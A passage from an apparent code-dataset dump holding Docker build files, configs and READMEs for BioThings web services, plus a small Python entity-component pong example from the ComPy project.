"text": "################################################################################\n# BioThings.Species Dockerfile\n################################################################################\n# A Dockerfile that contains biothings.species\n\nFROM biothings.api\n\nMAINTAINER Greg Taylor \"[email protected]\"\n\n# Download the latest version of Biothings.Interactions\n#RUN git clone https://github.com/biothings/biothings.species.git /usr/local/biothings.species\nADD biothings.species /usr/local/biothings.species\n\n# Change directory to '/usr/local/biothings.species'\nWORKDIR /usr/local/biothings.species\n\n# Install the Docker specific setup files\nADD config.py /usr/local/biothings.species/src/\nADD config_hub.py /usr/local/biothings.species/src/\nADD config_www.py /usr/local/biothings.species/src/\n\n# Install SSH Keys for the image\n# - (they can be overwritten when the container is started)\nADD ssh_host_key /usr/local/biothings.species/src/bin/\nADD ssh_host_key.pub /usr/local/biothings.species/src/bin/\nADD biothings.pub /usr/local/biothings.species/src/bin/authorized_keys/\n\n# Setup the biothings.species hub data directory structure\nRUN mkdir /tmp/run\nRUN mkdir /data\nRUN mkdir /data/diff\nRUN mkdir /data/logs\nRUN mkdir /data/release\nRUN mkdir /data/userquery\n\n# Change directory to 'src'\nWORKDIR /usr/local/biothings.species/src\n\n# Set Environment variables needed to run the Hub\nENV PYTHONPATH $PYTHONPATH:/usr/local/biothings.species/src\n\n# Run the biothings.species server on container start\nCMD python bin/hub.py\n\n"
},
{
"alpha_fraction": 0.5277246832847595,
"alphanum_fraction": 0.5564053654670715,
"avg_line_length": 19.920000076293945,
"blob_id": "0befdc33af10b1e071e958cce69b7e16ac8f74cf",
"content_id": "f360a819049904324acc4e7731c9356adcd40ef3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "YAML",
"length_bytes": 523,
"license_type": "permissive",
"max_line_length": 68,
"num_lines": 25,
"path": "/biothings.species/docker-compose.yml",
"repo_name": "ravila4/biothings_docker",
"src_encoding": "UTF-8",
"text": "version: \"3.3\"\n\nservices:\n mongodb:\n container_name: \"mongodb\"\n image: \"mongo:3.2\"\n networks:\n - biothings\n\n elasticsearch:\n container_name: \"elasticsearch\"\n image: \"docker.elastic.co/elasticsearch/elasticsearch:5.6.4\"\n networks:\n - biothings\n\n biothings.species:\n container_name: \"biothings.species\"\n image: \"biothings.species\"\n ports:\n - 8022:8022\n networks:\n - biothings\n\nnetworks:\n biothings:\n"
},
{
"alpha_fraction": 0.5695309042930603,
"alphanum_fraction": 0.5803238153457642,
"avg_line_length": 33.89855194091797,
"blob_id": "26ab4e1c74e3c4c09f2f4937d81ee754c7cbadc5",
"content_id": "0e87e4afbc267515ab8bf639e0ca33df0c5b1109",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2409,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 69,
"path": "/mychem.info/config.py",
"repo_name": "ravila4/biothings_docker",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# *****************************************************************************\n# Elasticsearch variables\n# *****************************************************************************\n# elasticsearch server transport url\nES_HOST = 'elasticsearch:9200'\n# elasticsearch index name\nES_INDEX_NAME = 'mydrugs_current'\n# elasticsearch document type\nES_DOC_TYPE = 'drug'\n# Only these options are passed to the elasticsearch query from kwargs\nALLOWED_OPTIONS = ['_source', 'start', 'from_', 'size', 'fields',\n 'sort', 'explain', 'version', 'facets', 'fetch_all']\nES_SCROLL_TIME = '1m'\nES_SCROLL_SIZE = 1000\nES_SIZE_CAP = 1000\n# This is the module for loading the esq variable in handlers\nES_QUERY_MODULE = 'api.es'\n\n# *****************************************************************************\n# Google Analytics Settings\n# *****************************************************************************\n# Google Analytics Account ID\nGA_ACCOUNT = ''\n# Turn this to True to start google analytics tracking\nGA_RUN_IN_PROD = False\n\n# 'category' in google analytics event object\nGA_EVENT_CATEGORY = 'v1_api'\n# 'action' for get request in google analytics event object\nGA_EVENT_GET_ACTION = 'get'\n# 'action' for post request in google analytics event object\nGA_EVENT_POST_ACTION = 'post'\n# url for google analytics tracker\nGA_TRACKER_URL = 'MyDrugs.info'\n\n# *****************************************************************************\n# URL settings\n# *****************************************************************************\n# For URL stuff\nANNOTATION_ENDPOINT = 'drug'\nQUERY_ENDPOINT = 'query'\nAPI_VERSION = 'v1'\n# TODO Fill in a status id here\nSTATUS_CHECK_ID = ''\n# Path to a file containing a json object with information about elasticsearch fields\nFIELD_NOTES_PATH = ''\n# Path to a file containing a json object with the json-ld context information\nJSONLD_CONTEXT_PATH = ''\n\nDATA_SRC_SERVER = 'mongodb'\nDATA_SRC_PORT = 27017\nDATA_SRC_DATABASE = 'mychem_src'\nDATA_SRC_SERVER_USERNAME = ''\nDATA_SRC_SERVER_PASSWORD = ''\n\nDATA_TARGET_SERVER = 'mongodb'\nDATA_TARGET_PORT = 27017\nDATA_TARGET_DATABASE = 'mychem_target'\nDATA_TARGET_SERVER_USERNAME = ''\nDATA_TARGET_SERVER_PASSWORD = ''\n\n# DATA_ARCHIVE_ROOT = '/path/to/data/folder'\nDATA_ARCHIVE_ROOT = '/data'\nimport os\nDIFF_PATH = os.path.join(DATA_ARCHIVE_ROOT,\"diff\")\n\nfrom config_hub import *\nfrom config_web import *\n\n"
},
{
"alpha_fraction": 0.7293233275413513,
"alphanum_fraction": 0.7293233275413513,
"avg_line_length": 23.18181800842285,
"blob_id": "779fdbb32d68cd33b03e57141818a0a6837ecf81",
"content_id": "120aef0bc1a7bbe4c8cf745bc2d58d10419fc586",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 266,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 11,
"path": "/biothings.api/README.md",
"repo_name": "ravila4/biothings_docker",
"src_encoding": "UTF-8",
"text": "# Biothings.api docker container\n### Maintainer: Greg Taylor ([email protected])\n\nBuild a docker image containing the docker.api package and all required\npython packages.\n\n## Installation\n### Build the biothings.api Docker image\n```\ndocker build --no-cache -t biothings.api .\n```\n"
},
{
"alpha_fraction": 0.772141695022583,
"alphanum_fraction": 0.7761674523353577,
"avg_line_length": 31.657894134521484,
"blob_id": "2d579b551660427817cd6805bddff5a30eabbb8d",
"content_id": "f81f8db7a63ef8e6bb3313ccdb0387a7c7c3fa33",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1242,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 38,
"path": "/biothings.interactions/README.md",
"repo_name": "ravila4/biothings_docker",
"src_encoding": "UTF-8",
"text": "# Biothings.interactions docker container\n### Maintainer: Greg Taylor ([email protected])\n\nBuild a docker image containing the docker.interactions package.\nSetup a development docker host running all required docker services.\n\n\n## Installation\n### Prerequisites\nRun the following commands to generate the required ssh key pairs.\nThe first command generates a key pair for the ssh host and the\nsecond generates a key pair for an authorized hub user.\n```\nssh-keygen -f ssh_host_key\nssh-keygen -f biothings\n```\n\n### Build the biothings.api Docker image\n```\ndocker build --no-cache -t biothings.interactions .\n```\n\n### Run the biothings.interactions evaluation environment\n\nBefore you run the docker-compose command you should generate a ssh_host_key file with\n`ssh-keygen -f ssh_host_key`. This key file will be mounted into the correct location when\nthe collection of containers is started.\n\n```\ndocker-compose -f docker-compose-evaluation.yml up\n```\n\nThe following docker containers are started:\n\n- biothings.data - an nginx server containing randomized data\n- mongodb - the mongodb server running version 3.2\n- elasticsearch - the ElasticSearch server running version 5.6.4\n- biothings.interactions - the server built by the Dockerfile in this directory\n\n"
},
{
"alpha_fraction": 0.49986129999160767,
"alphanum_fraction": 0.5029126405715942,
"avg_line_length": 44.04999923706055,
"blob_id": "4c3d9d637c2ad3201583a4e436dad0b6b7b73810",
"content_id": "af62fef6f1ef571d8cc50185dd6e64104b0e316b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3605,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 80,
"path": "/biothings.species/config_www.py",
"repo_name": "ravila4/biothings_docker",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport os\nfrom biothings.web.settings.default import *\nfrom web.api.query_builder import ESQueryBuilder\nfrom web.api.query import ESQuery\nfrom web.api.transform import ESResultTransformer\nfrom web.api.handlers import TaxonHandler, QueryHandler, MetadataHandler, StatusHandler\n\n# *****************************************************************************\n# Elasticsearch variables\n# *****************************************************************************\n# elasticsearch server transport url\nES_HOST = 'elasticsearch:9200'\n# elasticsearch index name\nES_INDEX = 'taxonomy'\n# elasticsearch document type\nES_DOC_TYPE = 'taxon'\n# defautlt number_of_shards when create a new index\n#ES_NUMBER_OF_SHARDS = 5\n\nAPI_VERSION = 'v1'\n\n# *****************************************************************************\n# App URL Patterns\n# *****************************************************************************\nAPP_LIST = [\n (r\"/status\", StatusHandler),\n (r\"/metadata/?\", MetadataHandler),\n (r\"/metadata/fields/?\", MetadataHandler),\n (r\"/{}/taxon/(.+)/?\".format(API_VERSION), TaxonHandler),\n (r\"/{}/taxon/?$\".format(API_VERSION), TaxonHandler),\n (r\"/{}/query/?\".format(API_VERSION), QueryHandler),\n (r\"/{}/metadata/?\".format(API_VERSION), MetadataHandler),\n (r\"/{}/metadata/fields/?\".format(API_VERSION), MetadataHandler),\n]\n\n###############################################################################\n# app-specific query builder, query, and result transformer classes\n###############################################################################\n\n# *****************************************************************************\n# Subclass of biothings.www.api.es.query_builder.ESQueryBuilder to build\n# queries for this app\n# *****************************************************************************\nES_QUERY_BUILDER = ESQueryBuilder\n# *****************************************************************************\n# Subclass of biothings.www.api.es.query.ESQuery to execute queries for this app\n# *****************************************************************************\nES_QUERY = ESQuery\n# *****************************************************************************\n# Subclass of biothings.www.api.es.transform.ESResultTransformer to transform\n# ES results for this app\n# *****************************************************************************\nES_RESULT_TRANSFORMER = ESResultTransformer\n\nGA_ACTION_QUERY_GET = 'query_get'\nGA_ACTION_QUERY_POST = 'query_post'\nGA_ACTION_ANNOTATION_GET = 'species_get'\nGA_ACTION_ANNOTATION_POST = 'species_post'\nGA_TRACKER_URL = 't.biothings.io'\n\nHIPCHAT_MESSAGE_COLOR = 'purple'\n\nSTATUS_CHECK = {\n 'id': '9606',\n 'index': 'taxonomy',\n 'doc_type': 'taxon'\n}\n\n# KWARGS for taxon API\nDEFAULT_FALSE_BOOL_TYPEDEF = {'default': False, 'type': bool}\nANNOTATION_GET_TRANSFORM_KWARGS.update({'include_children': DEFAULT_FALSE_BOOL_TYPEDEF, \n 'has_gene': DEFAULT_FALSE_BOOL_TYPEDEF})\nANNOTATION_POST_TRANSFORM_KWARGS.update({'include_children': DEFAULT_FALSE_BOOL_TYPEDEF,\n 'has_gene': DEFAULT_FALSE_BOOL_TYPEDEF,\n 'expand_species': DEFAULT_FALSE_BOOL_TYPEDEF})\nQUERY_GET_TRANSFORM_KWARGS.update({'include_children': DEFAULT_FALSE_BOOL_TYPEDEF,\n 'has_gene': DEFAULT_FALSE_BOOL_TYPEDEF})\nQUERY_POST_TRANSFORM_KWARGS.update({'include_children': DEFAULT_FALSE_BOOL_TYPEDEF,\n 'has_gene': DEFAULT_FALSE_BOOL_TYPEDEF})\n\n"
},
{
"alpha_fraction": 0.7685459852218628,
"alphanum_fraction": 0.773491621017456,
"avg_line_length": 31.580644607543945,
"blob_id": "354486807b8211459299fdabd4f4946b24f36e8f",
"content_id": "7c125ed02382fc864b0f0a7cfec2a8f4e21c27ed",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1011,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 31,
"path": "/biothings.species/README.md",
"repo_name": "ravila4/biothings_docker",
"src_encoding": "UTF-8",
"text": "# Biothings.species docker container\n### Maintainer: Greg Taylor ([email protected])\n\nBuild a docker image containing the docker.species package.\nSetup a development docker host running all required docker services.\n\n## Installation\n\n### Copy the biothings.species directory to this local directory\n\n### Build the biothings.species Docker image\n```\ndocker build --no-cache -t biothings.species .\n```\n\n### Run the biothings.species evaluation environment\n\nBefore you run the docker-compose command you should generate a ssh_host_key file with\n`ssh-keygen -f ssh_host_key`. This key file will be mounted into the correct location when\nthe collection of containers is started.\n\n```\ndocker-compose -f docker-compose.yml up\n```\n\nThe following docker containers are started:\n\n- biothings.data - an nginx server containing randomized data\n- mongodb - the mongodb server running version 3.2\n- elasticsearch - the ElasticSearch server running version 5.6.4\n- biothings.species - the server built by the Dockerfile in this directory\n\n"
},
{
"alpha_fraction": 0.7947368621826172,
"alphanum_fraction": 0.7947368621826172,
"avg_line_length": 30.66666603088379,
"blob_id": "116fded64f81fac2b34862587567b40fb06d54a4",
"content_id": "3736cc79e540879c64d03a24a7c27b7b911d168c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 570,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 18,
"path": "/README.md",
"repo_name": "ravila4/biothings_docker",
"src_encoding": "UTF-8",
"text": "# biothings.docker\n## BioThings Docker containers\n### Maintainer: Greg Taylor ([email protected])\n\nThis repository contains files needed to build docker images and\nsetup docker hosts using these images.\n\n### biothings.api\nBuild a docker image containing the docker.api package and all required\npython packages.\n\n### biothings.data\nRandomize data files and setup an nginx-like continer for serving these\nfiles on a docker host.\n\n### biothings.interactions\nA Dockerfile for the biothings.interactions application together with a\ndocker-compose file needed to run all required services.\n"
},
{
"alpha_fraction": 0.5934230089187622,
"alphanum_fraction": 0.597907304763794,
"avg_line_length": 38.29411697387695,
"blob_id": "79807f4add79bf87b2f63e9113cc7beb2805932f",
"content_id": "34a394ee69210558c99cb72edd7961510d4712aa",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 669,
"license_type": "permissive",
"max_line_length": 107,
"num_lines": 17,
"path": "/biothings.api/Dockerfile",
"repo_name": "ravila4/biothings_docker",
"src_encoding": "UTF-8",
"text": "################################################################################\n# BioThings Dockerfile\n################################################################################\n# A Dockerfile that contains BioThings.api and the required python dependencies\n\nFROM python\n\nMAINTAINER Greg Taylor \"[email protected]\"\n\n# Download the latest version of Biothings.api\n# RUN git clone --branch v0.1.3 https://github.com/greg-k-taylor/biothings.api.git /usr/local/biothings.api\nADD biothings.api /usr/local/biothings.api\n\n# Install the Biothings.api required pip libraries\nWORKDIR /usr/local/biothings.api\nRUN pip install -r requirements.txt\nRUN pip install /usr/local/biothings.api\n\n"
},
{
"alpha_fraction": 0.7354130744934082,
"alphanum_fraction": 0.7388792634010315,
"avg_line_length": 35.82978820800781,
"blob_id": "3ec532ecf7ccd98ead92e156d0d75a3a7f9f75d9",
"content_id": "2bc2e586e3f145f79c904fa00100d944c418c2a2",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 1731,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 47,
"path": "/biothings.interactions/Dockerfile",
"repo_name": "ravila4/biothings_docker",
"src_encoding": "UTF-8",
"text": "################################################################################\n# BioThings.Interactions Dockerfile\n################################################################################\n# A Dockerfile that contains biothings.interactions\n\nFROM biothings.api\n\nMAINTAINER Greg Taylor \"[email protected]\"\n\n# Download the latest version of Biothings.Interactions\n# RUN git clone https://github.com/biothings/biothings.interactions.git /usr/local/biothings.interactions\n\n# Add the latest version of Biothings.Interactions\nADD biothings.interactions /usr/local/biothings.interactions\nRUN pip install /usr/local/biothings.interactions\n\n# Change directory to '/usr/local/biothings.interactions'\nWORKDIR /usr/local/biothings.interactions\n\n# Git Checkout the v0.1.0 tag\n# RUN git checkout tags/v0.1.2\n\n# Install the Docker specific setup files\nADD config.py /usr/local/biothings.interactions/biointeract/\nADD config_hub.py /usr/local/biothings.interactions/biointeract/\nADD config_www.py /usr/local/biothings.interactions/biointeract/\n\n# Install keys\nADD ssh_host_key /usr/local/biothings.interactions/biointeract/bin\nADD ssh_host_key.pub /usr/local/biothings.interactions/biointeract/bin\nADD biothings.pub /usr/local/biothings.interactions/biointeract/bin/authorized_keys/\n\n# Setup the biothings.interactions hub data directory structure\nRUN mkdir /data\nRUN mkdir /data/diff\nRUN mkdir /data/logs\nRUN mkdir /data/release\nRUN mkdir /data/userquery\n\n# Change directory to 'biointeract'\nWORKDIR /usr/local/biothings.interactions/biointeract\n\n# Set Environment variables needed to run the Hub\nENV PYTHONPATH $PYTHONPATH:/usr/local/biothings.interactions/biointeract\n\n# Run the biothings.interactions server on container start\nCMD python bin/hub.py\n"
},
{
"alpha_fraction": 0.687543511390686,
"alphanum_fraction": 0.687543511390686,
"avg_line_length": 30.217391967773438,
"blob_id": "fc1d6665e143daa04cad172cb9087f46da697964",
"content_id": "e97205c946d9ba4a9841ee611435fe2a272fc71d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 1437,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 46,
"path": "/mychem.info/Dockerfile",
"repo_name": "ravila4/biothings_docker",
"src_encoding": "UTF-8",
"text": "################################################################################\n# BioThings.Species Dockerfile\n################################################################################\n# A Dockerfile that contains mychem.info\n\nFROM python\n\nMAINTAINER Greg Taylor \"[email protected]\"\n\n# Download the latest version of Biothings.Interactions\n#RUN git clone https://github.com/biothings/mychem.info.git /usr/local/mychem.info\nADD mychem.info /usr/local/mychem.info\n\n# Change directory to '/usr/local/mychem.info'\nWORKDIR /usr/local/mychem.info\n\n# Install python libraries\nRUN pip install -r requirements_hub.txt\nRUN pip install -r requirements_web.txt\n\n# Install the Docker specific setup files\nADD config.py /usr/local/mychem.info/src/\nADD config_hub.py /usr/local/mychem.info/src/\nADD config_web.py /usr/local/mychem.info/src/\n\n# Install SSH Keys for the image\n# - (they can be overwritten when the container is started)\nADD ssh_host_key /usr/local/mychem.info/src/bin/\nADD ssh_host_key.pub /usr/local/mychem.info/src/bin/\n\n# Setup the mychem.info hub data directory structure\nRUN mkdir /tmp/run\nRUN mkdir /data\nRUN mkdir /data/diff\nRUN mkdir /data/logs\nRUN mkdir /data/release\nRUN mkdir /data/userquery\n\n# Change directory to 'src'\nWORKDIR /usr/local/mychem.info/src\n\n# Set Environment variables needed to run the Hub\nENV PYTHONPATH $PYTHONPATH:/usr/local/mychem.info/src\n\n# Run the mychem.info server on container start\nCMD python bin/hub.py\n\n"
}
] | 12 |
adamlwgriffiths/ComPy
|
https://github.com/adamlwgriffiths/ComPy
|
d512f71c1a72f8503d0dae970fb9d9bd522e990e
|
daf13846ae66e158f3cc70990894e02c52377ecc
|
4fd0233d95191f063b6f42067e24f09889d4a132
|
refs/heads/master
| 2016-09-06T05:48:41.494310 | 2012-05-09T20:49:25 | 2012-05-09T20:49:25 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5352644920349121,
"alphanum_fraction": 0.5465995073318481,
"avg_line_length": 22.030303955078125,
"blob_id": "ca0f76077421f46eb538f28edd54215e785ab2aa",
"content_id": "a3132c990dea128144cc20844a6b886378d4b2ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1588,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 66,
"path": "/examples/pong/ball.py",
"repo_name": "adamlwgriffiths/ComPy",
"src_encoding": "UTF-8",
"text": "'''\r\nCreated on 10/05/2012\r\n\r\n@author: adam\r\n'''\r\n\r\nimport random\r\n\r\nfrom compy.entity import Entity\r\nfrom compy.component import Component\r\n\r\n\r\nclass BallMovementComponent( Component ):\r\n type = \"ball_movement\"\r\n \r\n def __init__( self, name ):\r\n super( BallMovementComponent, self ).__init__(\r\n BallMovementComponent.type,\r\n name\r\n )\r\n\r\n def update( self ):\r\n self.entity.data[ 'position' ] += self.entity.data[ 'velocity' ]\r\n\r\nclass BallContactComponent( Component ):\r\n type = \"ball_contact\"\r\n\r\n def __init__( self, name ):\r\n super( BallContactComponent, self ).__init__(\r\n BallContactComponent.type,\r\n name\r\n )\r\n\r\n def serve( self ):\r\n if self.entity == None:\r\n raise ValueError( \"Entity not set\" )\r\n\r\n # reset the ball's position\r\n self.entity.data[ 'position' ] = 0.0\r\n\r\n # select a velocity\r\n velocity = random.random()\r\n\r\n # pick a random direction\r\n if random.random() > 0.5:\r\n velocity *= -1.0\r\n\r\n # apply the velocity\r\n self.entity.data[ 'velocity' ] = velocity\r\n\r\n def hit( self, velocity ):\r\n # set our velocity\r\n self.entity.data[ 'velocity' ] = velocity\r\n\r\n\r\ndef create():\r\n entity = Entity( \"ball\" )\r\n entity.add_component(\r\n BallMovementComponent( 'movement' )\r\n )\r\n entity.add_component(\r\n BallContactComponent( 'contact' )\r\n )\r\n entity.data[ 'position' ] = 0.0\r\n entity.data[ 'velocity' ] = 0.0\r\n return entity\r\n\r\n"
},
{
"alpha_fraction": 0.5136584043502808,
"alphanum_fraction": 0.5200408697128296,
"avg_line_length": 25,
"blob_id": "71a7f5ce36f8550dd5286e545286970939dc47bd",
"content_id": "17366d085bc654dee67691b7e1ddf75c652548ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3917,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 145,
"path": "/examples/pong/bat.py",
"repo_name": "adamlwgriffiths/ComPy",
"src_encoding": "UTF-8",
"text": "'''\r\nCreated on 10/05/2012\r\n\r\n@author: adam\r\n'''\r\n\r\nimport random\r\n\r\nfrom compy.entity import Entity\r\nfrom compy.component import Component\r\n\r\nimport ball\r\n\r\n\r\nclass BatPositionComponent( Component ):\r\n type = \"bat_position\"\r\n \r\n def __init__( self, name ):\r\n super( BatPositionComponent, self ).__init__(\r\n BatPositionComponent.type,\r\n name\r\n )\r\n\r\n def update( self ):\r\n # find the ball\r\n ball_entity = Entity.find_entity( \"ball\" )\r\n if ball == None:\r\n raise ValueError( \"No ball entity\" )\r\n\r\n # see if it's within our hit distance\r\n ball_position = ball_entity.data[ 'position' ]\r\n\r\n bat_position = self.entity.data[ 'position' ]\r\n hit_distance = self.entity.data[ 'hit_distance' ]\r\n max_distance = bat_position + hit_distance\r\n min_distance = bat_position - hit_distance\r\n\r\n if \\\r\n ball_position > max_distance or \\\r\n ball_position < min_distance:\r\n # ball is too far away\r\n # do nothing\r\n return\r\n\r\n # see if it's coming in our direction\r\n # simply compare velocity direction with bat\r\n # position and assume only 2 bats\r\n # not the best component but its just an example\r\n ball_velocity = ball_entity.data[ 'velocity' ]\r\n if \\\r\n ball_velocity < 0.0 and \\\r\n bat_position > 0.0:\r\n # heading away\r\n return\r\n if \\\r\n ball_velocity > 0.0 and \\\r\n bat_position < 0.0:\r\n # heading away\r\n return\r\n\r\n # hit it!\r\n bat_hit = self.entity.find_component(\r\n BatHitComponent.type\r\n )\r\n if bat_hit == None:\r\n raise ValueError( \"No bat hit component\" )\r\n\r\n # hit the ball\r\n bat_hit.hit_ball()\r\n\r\nclass BatHitComponent( Component ):\r\n type = \"bat_hit\"\r\n\r\n def __init__( self, name, sleep_time, hit_chance ):\r\n super( BatHitComponent, self ).__init__(\r\n BatHitComponent.type,\r\n name\r\n )\r\n\r\n self.sleep_time = sleep_time\r\n self.last_hit = 0\r\n self.hit_chance = hit_chance\r\n\r\n def hit_ball( self ):\r\n # see if we can hit yet\r\n if self.last_hit > 0:\r\n # we already tried to hit it\r\n # don't continue\r\n return\r\n\r\n # set our last hit to our sleep time\r\n # this stops us taking unlimited hits\r\n self.last_hit = self.sleep_time\r\n\r\n # roll a dice and see if we hit it or not\r\n chance = random.random()\r\n\r\n if chance > self.hit_chance:\r\n # we've missed\r\n print \"%s missed the ball!\" % self.entity.name\r\n return\r\n\r\n # find the ball\r\n ball_entity = Entity.find_entity( \"ball\" )\r\n if ball == None:\r\n raise ValueError( \"No ball entity\" )\r\n\r\n ball_contact = ball_entity.find_component(\r\n ball.BallContactComponent.type\r\n )\r\n if ball_contact == None:\r\n raise ValueError( \"No ball contact component\" )\r\n\r\n velocity = random.random()\r\n position = self.entity.data[ 'position' ]\r\n\r\n if position > 0.0:\r\n velocity *= -1.0\r\n\r\n ball_contact.hit( velocity )\r\n\r\n print \"%s hit the ball!\" %self.entity.name\r\n\r\n def update( self ):\r\n if self.last_hit > 0:\r\n self.last_hit -= 1\r\n\r\n\r\ndef create( name, position, hit_distance, hit_chance, sleep_time ):\r\n entity = Entity( name )\r\n entity.add_component(\r\n BatPositionComponent( 'position' )\r\n )\r\n entity.add_component(\r\n BatHitComponent(\r\n 'hit',\r\n sleep_time,\r\n hit_chance\r\n )\r\n )\r\n\r\n entity.data[ 'position' ] = position\r\n entity.data[ 'hit_distance' ] = hit_distance\r\n\r\n return entity\r\n\r\n"
},
{
"alpha_fraction": 0.6144578456878662,
"alphanum_fraction": 0.6423588991165161,
"avg_line_length": 18.19230842590332,
"blob_id": "faac73dac55ecc6aad4f56174d6b787de9660a11",
"content_id": "3e476674d2ffa5398c1c57f7e5d0330d2a870c9c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1577,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 78,
"path": "/examples/pong/main.py",
"repo_name": "adamlwgriffiths/ComPy",
"src_encoding": "UTF-8",
"text": "'''\r\nCreated on 09/05/2012\r\n\r\n@author: adam\r\n'''\r\n\r\nfrom compy.entity import Entity\r\n\r\nimport ball\r\nimport bat\r\nimport table\r\n\r\n\r\ngames_to_play = 10\r\ntable_size = 30.0\r\nplayer_positions = [ -10.0, 10.0 ]\r\nplayer_hit_distance = 1.0\r\nplayer_hit_chance = 0.8\r\nplayer_time_between_hits = 5\r\n\r\n# create the ball\r\nball_entity = ball.create()\r\n\r\n# create player 1\r\nbat_left = bat.create(\r\n \"Player 1\",\r\n player_positions[ 0 ],\r\n player_hit_distance,\r\n player_hit_chance,\r\n player_time_between_hits\r\n )\r\n\r\n# create player 2\r\nbat_right = bat.create(\r\n \"Player 2\",\r\n player_positions[ 1 ],\r\n player_hit_distance,\r\n player_hit_chance,\r\n player_time_between_hits\r\n )\r\n\r\n# create the table\r\ntable_entity = table.create( table_size / 2.0 )\r\n\r\n# begin playing\r\nprint \"Playing to %i\" % games_to_play\r\n\r\n# serve the ball\r\nball_contact = ball_entity.find_component(\r\n ball.BallContactComponent.type\r\n )\r\n\r\nif ball_contact == None:\r\n raise ValueError( \"No ball contact component\" )\r\n\r\n\r\nball_contact.serve()\r\n\r\n# keep playing until the game is over\r\nwhile True:\r\n Entity.update_entities()\r\n\r\n if table_entity.data[ 'games' ] >= games_to_play:\r\n break\r\n\r\n# print final score\r\nprint \"Final score\"\r\nplayer1_score = table_entity.data[ 'left_score' ]\r\nplayer2_score = table_entity.data[ 'right_score' ]\r\nprint \"Player 1: %i\" % player1_score\r\nprint \"Player 2: %i\" % player2_score\r\n\r\nif player1_score > player2_score:\r\n print \"Player 1 Wins!\"\r\nelif player1_score < player2_score:\r\n print \"Player 2 Wins!\"\r\nelse:\r\n print \"Tied game!\"\r\n\r\n"
},
{
"alpha_fraction": 0.5181347131729126,
"alphanum_fraction": 0.5261945724487305,
"avg_line_length": 21.76712417602539,
"blob_id": "bc7e73e41791b2bf4a5e0b91cf3c73e9ec50caab",
"content_id": "386a95b36e92060e8e75e0c8e14919fcfda4e171",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1737,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 73,
"path": "/examples/pong/table.py",
"repo_name": "adamlwgriffiths/ComPy",
"src_encoding": "UTF-8",
"text": "'''\r\nCreated on 10/05/2012\r\n\r\n@author: adam\r\n'''\r\n\r\nimport random\r\n\r\nfrom compy.entity import Entity\r\nfrom compy.component import Component\r\n\r\nimport ball\r\n\r\n\r\nclass BallCheckComponent( Component ):\r\n type = \"ball_check\"\r\n \r\n def __init__( self, name, half_size ):\r\n super( BallCheckComponent, self ).__init__(\r\n BallCheckComponent.type,\r\n name\r\n )\r\n self.half_size = half_size\r\n\r\n def update( self ):\r\n # find the ball\r\n ball_entity = Entity.find_entity( \"ball\" )\r\n if ball == None:\r\n raise ValueError( \"No ball entity\" )\r\n\r\n # see if it's out of bounds\r\n ball_position = ball_entity.data[ 'position' ]\r\n\r\n if \\\r\n ball_position >= -self.half_size and \\\r\n ball_position <= self.half_size:\r\n # ball still in play\r\n return\r\n\r\n\r\n if ball_position < -self.half_size:\r\n # out of bounds\r\n print \"Ball out of bounds on left\"\r\n self.entity.data[ 'right_score' ] += 1\r\n\r\n if ball_position > self.half_size:\r\n # out of bounds\r\n print \"Ball out of bounds on right\"\r\n self.entity.data[ 'left_score' ] += 1\r\n\r\n self.entity.data[ 'games' ] += 1\r\n\r\n # serve the ball\r\n ball_contact = ball_entity.find_component(\r\n ball.BallContactComponent.type\r\n )\r\n ball_contact.serve()\r\n\r\n\r\n\r\n\r\n\r\ndef create( half_size ):\r\n entity = Entity( \"table\" )\r\n entity.add_component(\r\n BallCheckComponent( 'ball_check', half_size )\r\n )\r\n\r\n entity.data[ 'left_score' ] = 0\r\n entity.data[ 'right_score' ] = 0\r\n entity.data[ 'games' ] = 0\r\n\r\n return entity\r\n\r\n"
},
{
"alpha_fraction": 0.5077950954437256,
"alphanum_fraction": 0.5122494697570801,
"avg_line_length": 24.776119232177734,
"blob_id": "9285de25efaf86cbb97320ec9d7b72c9158fd899",
"content_id": "59c84ab571260f90a2699f720da64d5e9b59e8dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1796,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 67,
"path": "/compy/entity.py",
"repo_name": "adamlwgriffiths/ComPy",
"src_encoding": "UTF-8",
